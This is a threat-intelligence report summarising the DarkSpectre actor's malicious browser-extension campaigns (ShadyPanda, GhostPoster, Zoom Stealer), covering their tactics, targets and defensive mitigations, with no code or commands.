Full Report
The threat actor behind two malicious browser extension campaigns, ShadyPanda and GhostPoster, has been attributed to a third attack campaign codenamed DarkSpectre that has impacted 2.2 million users of Google Chrome, Microsoft Edge, and Mozilla Firefox. The activity is assessed to be the work of a Chinese threat actor that Koi Security is tracking under the moniker DarkSpectre. In all, the
Analysis Summary
# Threat Actor: DarkSpectre
## Attribution & Identity
* **Primary Identification:** DarkSpectre (Moniker used by Koi Security).
* **Attribution:** Assessed to be a Chinese threat actor.
* **Known Aliases/Associated Groups:** Linked to the actors behind the malicious browser extension campaigns previously tracked as ShadyPanda and GhostPoster.
## Activity Summary
DarkSpectre is responsible for three known malicious browser extension campaigns which have collectively impacted over 8.8 million users over a period spanning more than seven years:
1. **ShadyPanda:** Affected 5.6 million users across Chrome, Edge, and Firefox. Objectives included data theft, search query hijacking, and affiliate fraud. This campaign utilized extensions containing logic bombs (e.g., "New Tab - Customized Dashboard") set to activate maliciously after a delay (e.g., three days) to bypass review processes. It involved over 100 flagged extensions, with 9 currently active and 85 identified as "dormant sleepers" designed to build a user base before receiving weaponizing updates years later.
2. **GhostPoster:** Primarily targeted Mozilla Firefox users with seemingly benign utilities and VPN tools to inject tracking code and hijack affiliate links for click/ad fraud.
3. **The Zoom Stealer:** A campaign involving 18 extensions across Chrome, Edge, and Firefox, specifically designed to collect corporate meeting intelligence. This campaign impacted 2.2 million users.
## Tactics, Techniques & Procedures
* **Malicious Deployment via Browser Extensions:** Distributing malware through official or quasi-official browser repositories (Chrome Web Store, Edge Add-ons, Firefox Add-ons).
* **Logic Bombs/Time Delays:** Implementing code that triggers malicious functionality after a specified delay (e.g., three days) post-installation to evade initial security screening.
* **Dormant Sleepers:** Maintaining seemingly benign extensions to cultivate a large user base before pushing malicious updates after long periods of inactivity (up to five years in some cases).
* **Masquerading/Impersonation:** Designing extensions to mimic legitimate or popular tools, particularly for enterprise videoconferencing applications (Zoom, Google Meet, GoTo Webinar).
* **Data Exfiltration (Meeting Intelligence):** Harvesting sensitive meeting data in real-time over WebSocket connections, including meeting URLs (with embedded passwords), meeting IDs, topics, scheduled times, and registration status.
* **Information Harvesting (Webinar/Corporate):** Collecting details about webinar speakers/hosts (names, titles, affiliations, photos) and session metadata.
* **Fraud:** Engaging in affiliate link hijacking and committing click/ad fraud.
## Targeting
* **Sectors:** Implicitly targeting corporate environments utilizing enterprise video conferencing tools (Zoom, Google Meet, GoTo Webinar). Sectors involved in corporate meetings and webinars are primary targets based on the "Zoom Stealer" objectives.
* **Geography:** Global ("Impacting 8.8 Million Users Worldwide").
* **Victims:** 2.2 million users impacted by the DarkSpectre campaign subset (Zoom Stealer), and 5.6 million by the ShadyPanda subset. Specific organizations are not named, but the focus on corporate meeting intelligence suggests a focus on enterprise users.
## Tools & Infrastructure
* **Malware Families Used:** Malicious browser extensions tailored for specific malicious functions (data theft, hijacking, intelligence exfiltration).
* **Infrastructure (C2, domains, IPs):** Data exfiltration occurs over a **WebSocket connection** in real-time. Specific C2 details were not provided in the text snippet.
## Implications
The sustained nature (seven years) and massive scale (8.8 million users) of these campaigns highlight a sophisticated, patient Chinese threat actor focused on establishing wide-ranging persistence within end-user environments via seemingly trusted browser extensions. The shift toward stealing corporate meeting intelligence suggests a focus on espionage, corporate reconnaissance, or business email compromise (BEC) preparation, moving beyond simple ad fraud. The use of logic bombs and dormant sleepers demonstrates advanced evasion tactics intended to maintain credibility across platform reviews.
## Mitigations
* Conduct thorough scrutiny of newly installed browser extensions, paying special attention to those offering features related to popular productivity or meeting software.
* Monitor browser extension behavior for unusual network connections, particularly WebSocket traffic to unknown external servers.
* Limit permissions granted to browser extensions, ensuring they only request necessary access rights.
* Implement controls or use enterprise security solutions that can detect and block logic bombs or delayed malicious payloads post-installation.
* Use enterprise endpoint/browser monitoring to detect real-time data exfiltration patterns, especially concerning meeting credentials or sensitive data structures.